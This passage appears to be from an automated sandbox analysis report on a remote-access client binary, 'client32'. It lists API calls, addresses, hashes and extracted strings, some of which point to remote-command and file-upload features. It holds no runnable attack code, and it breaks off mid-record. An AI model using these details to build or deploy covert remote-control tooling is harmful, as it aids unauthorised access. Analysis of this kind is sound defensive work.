                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Object$Delete$Select$MessagePostQuitShowWindowwsprintf
                                                                                                                                                                                                    • String ID: %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s$Annotate$FillColour$FillStyle$Font$PenColour$PenStyle$PenWidth$Tool
                                                                                                                                                                                                    • API String ID: 4003178439-770455996
                                                                                                                                                                                                    • Opcode ID: 26177ce62bbb57279373dbf2d334d62ed57bccf9437a2dbeea888348ad9f5431
                                                                                                                                                                                                    • Instruction ID: 0e393dd9f50b4abf726b269e2623b848e1bd90be6afddd879db765a1a84127a1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 26177ce62bbb57279373dbf2d334d62ed57bccf9437a2dbeea888348ad9f5431
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7A813AB5600605AFE364DBA5C990EABF7F9AF8C304F10450DF6AA97241DA71FC41CB60
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: %spciinv.dll$%sremcmdstub.exe$Client$DEMO$DisableInventory$DisableRemoteCmd$EnableSmartcardAuth$Inactivity$MinimumEncryption$Password$UseNTSecurity$UserAcknowledge$Usernames$_License$_debug$platformid$serial_no
                                                                                                                                                                                                    • API String ID: 0-1779888543
                                                                                                                                                                                                    • Opcode ID: e16a8755776086d36e1b31847ec66cab136d5ab0f4874b86e8c28349ff3edf32
                                                                                                                                                                                                    • Instruction ID: 5762d973d5433722e04aa92932485fba5c9e567f96aab9c52d96a157c048a66c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e16a8755776086d36e1b31847ec66cab136d5ab0f4874b86e8c28349ff3edf32
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3AD1D674F053199BEB91CF65CC40FEEB7B5AF45704F0044D9E519AB280EB70A984CB55
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetWindowTextA.USER32(00000000,?,00000040), ref: 11045830
                                                                                                                                                                                                    • GetDlgItem.USER32(00000000,?), ref: 1104586E
                                                                                                                                                                                                    • SetWindowTextA.USER32(00000000,00000000), ref: 110458C3
                                                                                                                                                                                                    • SetDlgItemTextA.USER32(00000000,?,?), ref: 110458E0
                                                                                                                                                                                                    • SetDlgItemTextA.USER32(00000000,0000046D,?), ref: 110458F5
                                                                                                                                                                                                    • SetDlgItemTextA.USER32(00000000,0000047B,00000000), ref: 1104591B
                                                                                                                                                                                                    • GetDlgItem.USER32(00000000,?), ref: 110459A0
                                                                                                                                                                                                    • GetDlgItem.USER32(00000000,00000001), ref: 110459FD
                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 11045A00
                                                                                                                                                                                                    • SetWindowPos.USER32(00000000,00000001,-0000000A,-0000000A,00000000,00000000,00000041,00000000), ref: 11045A83
                                                                                                                                                                                                    • SetTimer.USER32(00000000,00000001,000003E8,00000000), ref: 11045947
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                      • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                                                                                    • SetWindowPos.USER32(00000000,000000FF,?,00000000,00000000,00000000,00000041), ref: 11045AC8
                                                                                                                                                                                                    • BringWindowToTop.USER32(?), ref: 11045ADC
                                                                                                                                                                                                      • Part of subcall function 1115B8E0: SetForegroundWindow.USER32(00000000), ref: 1115B90E
                                                                                                                                                                                                    • MessageBeep.USER32(000000FF), ref: 11045AED
                                                                                                                                                                                                      • Part of subcall function 11141710: GetVersionExA.KERNEL32(111ECE98,76596610), ref: 11141740
                                                                                                                                                                                                      • Part of subcall function 11141710: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114177F
                                                                                                                                                                                                    • GetSystemMetrics.USER32(0000000C), ref: 11045B51
                                                                                                                                                                                                    • GetSystemMetrics.USER32(0000000B), ref: 11045B56
                                                                                                                                                                                                    • LoadImageA.USER32(00000000,00000483,00000001,00000000), ref: 11045B66
                                                                                                                                                                                                    • DestroyCursor.USER32(00000000), ref: 11045B8D
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$Item$Text$MessageMetricsSystemwsprintf$BeepBringCursorDestroyErrorExitForegroundImageLastLoadOpenProcessShowTimerVersion
                                                                                                                                                                                                    • String ID: CLTCONN.CPP$Create Message Dialog$Register for log off event$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd$m_idata
                                                                                                                                                                                                    • API String ID: 3778382965-926533556
                                                                                                                                                                                                    • Opcode ID: c68913eaa637acba0dd0a477afb990d6e0eb63502d1e20dde54b094dab0fbbb5
                                                                                                                                                                                                    • Instruction ID: fbb7bb46882f2f9d323433b6bf250fd0ae6c3b835bfed70dc686f61fe2a867e7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c68913eaa637acba0dd0a477afb990d6e0eb63502d1e20dde54b094dab0fbbb5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 07C1B475B00716AFE711CBA5CCC1FAAF7E9AF44708F108468F6259B680EB75E940CB51
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00000064,00000000,?,00000000), ref: 1109D152
                                                                                                                                                                                                    • OpenProcess.KERNEL32(00100000,00000000,?), ref: 1109D175
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 1109D180
                                                                                                                                                                                                    • ResetEvent.KERNEL32(?), ref: 1109D195
                                                                                                                                                                                                    • ResetEvent.KERNEL32(?), ref: 1109D19B
                                                                                                                                                                                                    • SetEvent.KERNEL32(?), ref: 1109D1A1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Event$Reset$CloseHandleMultipleObjectsOpenProcessWait
                                                                                                                                                                                                    • String ID: ..\CTL32\ipc.cpp$cbdata=%d, datalen-sizeof=%d$deadshare$iffy result$no error$senderror$timeout
                                                                                                                                                                                                    • API String ID: 1194186020-3727536503
                                                                                                                                                                                                    • Opcode ID: 53726f0fd4f3a0fb9772eb67dd7fc1ed00702a47c42144c9a1f6c50b7287015d
                                                                                                                                                                                                    • Instruction ID: 6b473be9785bc0d4b7e502112369cfe56b08eb277d01e6e1a90085580c10e120
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 53726f0fd4f3a0fb9772eb67dd7fc1ed00702a47c42144c9a1f6c50b7287015d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 49B16FB5A007089BD720CF25D894B5AF7F5BF88314F10CA9DEA4A9B640CB70E981DF60
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • BeginPaint.USER32(?,?), ref: 1101549F
                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 110154B7
                                                                                                                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 110154E1
                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 110154F5
                                                                                                                                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 11015500
                                                                                                                                                                                                    • BeginPath.GDI32(00000000), ref: 1101550D
                                                                                                                                                                                                    • TextOutA.GDI32(00000000,00000000,00000000), ref: 11015530
                                                                                                                                                                                                    • EndPath.GDI32(00000000), ref: 11015537
                                                                                                                                                                                                    • PathToRegion.GDI32(00000000), ref: 1101553E
                                                                                                                                                                                                    • CreateSolidBrush.GDI32(?), ref: 11015550
                                                                                                                                                                                                    • CreateSolidBrush.GDI32(?), ref: 11015566
                                                                                                                                                                                                    • CreatePen.GDI32(00000000,00000002,?), ref: 11015580
                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 1101558E
                                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 1101559E
                                                                                                                                                                                                    • GetRgnBox.GDI32(00000000,?), ref: 110155AB
                                                                                                                                                                                                    • OffsetRgn.GDI32(00000000,?,00000000), ref: 110155CA
                                                                                                                                                                                                    • FillRgn.GDI32(00000000,00000000,?), ref: 110155D9
                                                                                                                                                                                                    • FrameRgn.GDI32(00000000,00000000,?,00000002,00000002), ref: 110155EC
                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 110155F9
                                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 11015603
                                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 1101560D
                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 11015616
                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 1101561F
                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 11015628
                                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 11015632
                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 1101563B
                                                                                                                                                                                                    • SetBkMode.GDI32(00000000,?), ref: 11015645
                                                                                                                                                                                                    • EndPaint.USER32(?,?), ref: 11015659
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Object$Select$Delete$Create$Path$BeginBrushModePaintSolid$FillFontFrameIndirectOffsetRectRegionTextWindow
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1317707293-0
                                                                                                                                                                                                    • Opcode ID: f9345a281c66595ab423393b8d545c26d76a2e4da1908697bef58f556e94efce
                                                                                                                                                                                                    • Instruction ID: 1c6fdd3f784209e1156a4ff31251cb138f082964e1cd822c4cbcc4281ff6dda7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f9345a281c66595ab423393b8d545c26d76a2e4da1908697bef58f556e94efce
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2851FC75A01229AFDB11DBA4CC88FAEF7B9FF89304F108199F605D7244DB749A448F62
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetSysColor.USER32(00000004), ref: 1100380F
                                                                                                                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 1100382A
                                                                                                                                                                                                    • GetSysColor.USER32(00000010), ref: 1100383D
                                                                                                                                                                                                    • GetSysColor.USER32(00000010), ref: 11003854
                                                                                                                                                                                                    • GetSysColor.USER32(00000014), ref: 1100386B
                                                                                                                                                                                                    • GetSysColor.USER32(00000014), ref: 11003882
                                                                                                                                                                                                    • GetSysColor.USER32(00000014), ref: 110038A5
                                                                                                                                                                                                    • GetSysColor.USER32(00000014), ref: 110038BC
                                                                                                                                                                                                    • GetSysColor.USER32(00000010), ref: 110038D3
                                                                                                                                                                                                    • GetSysColor.USER32(00000010), ref: 110038EA
                                                                                                                                                                                                    • GetSysColor.USER32(00000004), ref: 11003901
                                                                                                                                                                                                    • SetBkColor.GDI32(00000000,00000000), ref: 11003908
                                                                                                                                                                                                    • InflateRect.USER32(?,000000FE,000000FD), ref: 11003916
                                                                                                                                                                                                    • GetSysColor.USER32(00000010), ref: 11003932
                                                                                                                                                                                                    • CreatePen.GDI32(?,00000001,00000000), ref: 1100393B
                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 11003949
                                                                                                                                                                                                    • MoveToEx.GDI32(00000000,?,?,00000000), ref: 11003962
                                                                                                                                                                                                    • LineTo.GDI32(00000000,?,?), ref: 11003976
                                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 11003984
                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 1100398E
                                                                                                                                                                                                    • GetSysColor.USER32(00000014), ref: 1100399C
                                                                                                                                                                                                    • CreatePen.GDI32(?,00000001,00000000), ref: 110039A5
                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 110039B2
                                                                                                                                                                                                    • MoveToEx.GDI32(00000000,?,?,00000000), ref: 110039CE
                                                                                                                                                                                                    • LineTo.GDI32(00000000,?,?), ref: 110039E5
                                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 110039F3
                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 110039FA
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Color$Object$Select$CreateDeleteInflateLineMoveRect
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1903512896-0
                                                                                                                                                                                                    • Opcode ID: 1ab8ec13b9c3d8d80ecb74cf7a7032847e3083b317342f6409bc525a428a3736
                                                                                                                                                                                                    • Instruction ID: 3027e757ba1171f6112b6b60bda5e7e925a43277d9ff2db94d61a7c43587e01c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ab8ec13b9c3d8d80ecb74cf7a7032847e3083b317342f6409bc525a428a3736
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B2814FB590030AAFDB14DFA4CC85FBFF7B9EF88304F104A58E611A7285D671A945CBA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085295170.00000000689B0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085459790.00000000689F9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085581340.0000000068A00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLast
                                                                                                                                                                                                    • String ID: CMD=PUTFILE$DATA=$FLEN=%d$FNAME=%s$GSK=%s$Gateway_Gsk$Gateway_Operator$Gateway_Password$MORE=%d$OFFSET=%d$ON=%s$PWD=%s$SUB=%s$ctl_putfile - _filelength FAILED (error: %d)$ctl_putfile - _topen FAILED (error: %d)$ctl_putfile - empty file (%s)$putfile - _read FAILED (error: %d)
                                                                                                                                                                                                    • API String ID: 1452528299-2149975586
                                                                                                                                                                                                    • Opcode ID: 561c0988f8f1cc5d3af2330b1a598cc42cb55d53adb4fc4d2a8da90c4d46ed25
                                                                                                                                                                                                    • Instruction ID: 3de54ac4933e972391479bb2181c1356488e076a28c88e23173637e5c91d3217
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 561c0988f8f1cc5d3af2330b1a598cc42cb55d53adb4fc4d2a8da90c4d46ed25
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 43B1A6B6D00218ABDB24DBF4CC44FEEB778AF55308F908159E518A7245EB31DA45CFA2
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 11141430: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,765A5530), ref: 11141457
                                                                                                                                                                                                    • ExtractIconA.SHELL32(11000000,00000000,00000000), ref: 110433F9
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 11043558
                                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,?,?), ref: 110435F2
                                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,00000002,?), ref: 11043627
                                                                                                                                                                                                    • SetTimer.USER32(00000000,00000001,000003E8,00000000), ref: 11043676
                                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,?,11190240), ref: 1104368E
                                                                                                                                                                                                    • BringWindowToTop.USER32(?), ref: 110436CA
                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000003), ref: 110436E3
                                                                                                                                                                                                    • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003), ref: 110436F8
                                                                                                                                                                                                      • Part of subcall function 1115B8E0: SetForegroundWindow.USER32(00000000), ref: 1115B90E
